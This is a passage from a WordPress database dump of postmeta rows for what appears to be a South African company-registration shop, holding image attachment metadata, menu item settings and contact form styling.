'_menu_item_xfn',''),(1140,173,'_menu_item_url',''),(1141,174,'_wp_attached_file','2016/03/Private-Company-registration-full-cover.png'),(1142,174,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:51:\"2016/03/Private-Company-registration-full-cover.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:51:\"Private-Company-registration-full-cover-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1143,174,'_wp_attachment_image_alt','Company registration full'),(1145,175,'_edit_lock','1458656421:1'),(1146,175,'_edit_last','1'),(1147,175,'form_id','175'),(1148,175,'form_style','{\"layout\":\"form-vertical\",\"theme\":\"wr-style-light\",\"themes_style\":{\"light\":\"{\\\"background_color\\\":\\\"#ffffff\\\",\\\"background_active_color\\\":\\\"#fcf8e3\\\",\\\"border_thickness\\\":\\\"0\\\",\\\"border_color\\\":\\\"#ffffff\\\",\\\"border_active_color\\\":\\\"#fbeed5\\\",\\\"rounded_corner_radius\\\":\\\"0\\\",\\\"padding_space\\\":\\\"10\\\",\\\"margin_space\\\":\\\"0\\\",\\\"text_color\\\":\\\"#333333\\\",\\\"font_type\\\":\\\"Verdana, Geneva, sans-serif\\\",\\\"font_size\\\":\\\"14\\\",\\\"field_background_color\\\":\\\"#ffffff\\\",\\\"field_border_color\\\":\\\"#cccccc\\\",\\\"field_shadow_color\\\":\\\"#ffffff\\\",\\\"field_text_color\\\":\\\"#666666\\\",\\\"message_error_background_color\\\":\\\"#b94a48\\\",\\\"message_error_text_color\\\":\\\"#ffffff\\\",\\\"help_text_type\\\":\\\"tooltip\\\",\\\"button_position\\\":\\\"btn-toolbar\\\",\\\"button_submit_color\\\":\\\"btn btn-primary\\\",\\\"button_reset_color\\\":\\\"btn\\\",\\\"button_prev_color\\\":\\\"btn\\\",\\\"button_next_color\\\":\\\"btn\\\",\\\"custom_css\\\":\\\"\\\"}\",\"dark\":\"{\\\"background_color\\\":\\\"#ffffff\\\",\\\"background_active_color\\\":\\\"#444444\\\",\\\"border_thickness\\\":\\\"0\\\",\\\"border_color\\\":\\\"#ffffff\\\",\\\"border_active_color\\\":\\\"#666666\\\",\\\"rounded_corner_radius\\\":\\\"0\\\",\\\"padding_space\\\":\\\"10\\\",\\\"margin_space\\\":\\\"0\\\",\\\"text_color\\\":\\\"#c6c6c6\\\",\\\"font_type\\\":\\\"Verdana, Geneva, sans-serif\\\",\\\"font_size\\\":\\\"14\\\",\\\"field_background_color\\\":\\\"#000000\\\",\\\"field_border_color\\\":\\\"#111111\\\",\\\"field_shadow_color\\\":\\\"#000000\\\",\\\"field_text_color\\\":\\\"#333333\\\",\\\"message_error_background_color\\\":\\\"#b94a48\\\",\\\"message_error_text_color\\\":\\\"#ffffff\\\",\\\"help_text_type\\\":\\\"tooltip\\\",\\\"button_position\\\":\\\"btn-toolbar\\\",\\\"button_submit_color\\\":\\\"btn btn-primary\\\",\\\"button_reset_color\\\":\\\"btn\\\",\\\"button_prev_color\\\":\\\"btn\\\",\\\"button_next_color\\\":\\\"btn\\\",\\\"custom_css\\\":\\\"\\\"}\"},\"themes\":[\"light\",\"dark\"],\"background_color\":\"#ffffff\",\"background_active_color\":\"#fcf8e3\",\"border_thickness\":\"0\",\"border_color\":\"#ffffff\",\"border_active_color\":\"#fbeed5\",\"rounded_corner_radius\":\"0\",\"padding_space\":\"10\",\"margin_space\":\"0\",\"text_color\":\"#333333\",\"font_type\":\"Verdana, Geneva, sans-serif\",\"font_size\":\"14\",\"field_background_color\":\"#ffffff\",\"field_border_color\":\"#cccccc\",\"field_shadow_color\":\"#ffffff\",\"field_text_color\":\"#666666\",\"message_error_background_color\":\"#b94a48\",\"message_error_text_color\":\"#ffffff\",\"help_text_type\":\"tooltip\",\"button_position\":\"btn-toolbar\",\"button_submit_color\":\"btn btn-primary\",\"button_reset_color\":\"btn\",\"button_prev_color\":\"btn\",\"button_next_color\":\"btn\",\"custom_css\":\"\"}'),(1149,175,'form_settings','{\"form_captcha\":\"\",\"form_btn_next_text\":\"Next\",\"form_btn_prev_text\":\"Prev\",\"form_btn_submit_text\":\"Submit\",\"form_btn_reset_text\":\"Reset\",\"form_state_btn_reset_text\":\"No\"}'),(1150,175,'form_type','1'),(1151,175,'list_email_send_to',''),(1152,175,'list_email_send_to_submitter',''),(1153,175,'content_email_send_to',''),(1154,175,'content_email_send_to_submitter',''),(1155,175,'form_post_action_data','a:9:{s:15:\"contactform_url\";s:0:\"\";s:24:\"contactform_show_message\";s:35:\"<div>Thanks for your submit! </div>\";s:4:\"post\";s:3:\"136\";s:4:\"page\";s:2:\"52\";s:7:\"product\";s:2:\"59\";s:8:\"category\";s:1:\"1\";s:11:\"product_cat\";s:1:\"8\";s:11:\"product_tag\";s:2:\"21\";s:22:\"product_shipping_class\";s:2:\"19\";}'),(1156,175,'action_save_submissions','Yes'),(1157,175,'form_post_action','contactform_show_message'),(1158,175,'mailchimp_settings','{\"use\":\"no\",\"apikey\":\"\",\"lists\":[]}'),(1161,178,'_edit_lock','1560435920:3'),(1162,178,'_edit_last','1'),(1163,178,'_wp_page_template','page-template-blank.php'),(1164,178,'_responsive_layout','default'),(1165,183,'_wp_attached_file','2016/03/Private-Company-registration-customised-MOI.png'),(1166,183,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:55:\"2016/03/Private-Company-registration-customised-MOI.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:55:\"Private-Company-registration-customised-MOI-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1167,183,'_wp_attachment_image_alt','Private Company registration customised MOI'),(1168,62,'_thumbnail_id','183'),(1169,184,'_edit_lock','1503844241:1'),(1170,184,'_edit_last','1'),(1171,184,'_wp_page_template','default'),(1172,184,'_responsive_layout','default'),(1173,186,'_menu_item_type','post_type'),(1174,186,'_menu_item_menu_item_parent','0'),(1175,186,'_menu_item_object_id','184'),(1176,186,'_menu_item_object','page'),(1177,186,'_menu_item_target',''),(1178,186,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1179,186,'_menu_item_xfn',''),(1180,186,'_menu_item_url',''),(1183,190,'_wp_attached_file','2016/03/Personal-Liability-Company.png'),(1184,190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:38:\"2016/03/Personal-Liability-Company.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"Personal-Liability-Company-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"Personal-Liability-Company-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:38:\"Personal-Liability-Company-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1185,190,'_wp_attachment_image_alt','Personal Liability Company'),(1186,64,'_thumbnail_id','190'),(1187,64,'_wc_rating_count','a:0:{}'),(1188,64,'_wc_average_rating','0'),(1189,191,'_menu_item_type','post_type'),(1190,191,'_menu_item_menu_item_parent','173'),(1191,191,'_menu_item_object_id','62'),(1192,191,'_menu_item_object','product'),(1193,191,'_menu_item_target',''),(1194,191,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1195,191,'_menu_item_xfn',''),(1196,191,'_menu_item_url',''),(1197,192,'_menu_item_type','post_type'),(1198,192,'_menu_item_menu_item_parent','173'),(1199,192,'_menu_item_object_id','64'),(1200,192,'_menu_item_object','product'),(1201,192,'_menu_item_target',''),(1202,192,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1203,192,'_menu_item_xfn',''),(1204,192,'_menu_item_url',''),(1205,64,'_wc_review_count','0'),(1206,80,'_wc_rating_count','a:0:{}'),(1207,80,'_wc_review_count','0'),(1208,80,'_wc_average_rating','0'),(1213,198,'_wp_attached_file','2016/03/BEE-Affidavit-cover-Final.png'),(1214,198,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:37:\"2016/03/BEE-Affidavit-cover-Final.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:37:\"BEE-Affidavit-cover-Final-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1215,198,'_wp_attachment_image_alt','BEE Affidavit'),(1216,79,'_thumbnail_id','198'),(1217,79,'_wc_rating_count','a:0:{}'),(1218,79,'_wc_review_count','0'),(1219,79,'_wc_average_rating','0'),(1220,200,'_wp_attached_file','2016/03/Change-in-Director-cover-final.png'),(1221,200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:42:\"2016/03/Change-in-Director-cover-final.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:42:\"Change-in-Director-cover-final-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1222,200,'_wp_attachment_image_alt','Change in Director'),(1223,65,'_thumbnail_id','200'),(1224,65,'_wc_rating_count','a:0:{}'),(1225,65,'_wc_review_count','0'),(1226,65,'_wc_average_rating','0'),(1227,202,'_wp_attached_file','2016/03/Change-in-Member-cover.png'),(1228,202,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:34:\"2016/03/Change-in-Member-cover.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"Change-in-Member-cover-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"Change-in-Member-cover-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:34:\"Change-in-Member-cover-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1229,202,'_wp_attachment_image_alt','Change in CC 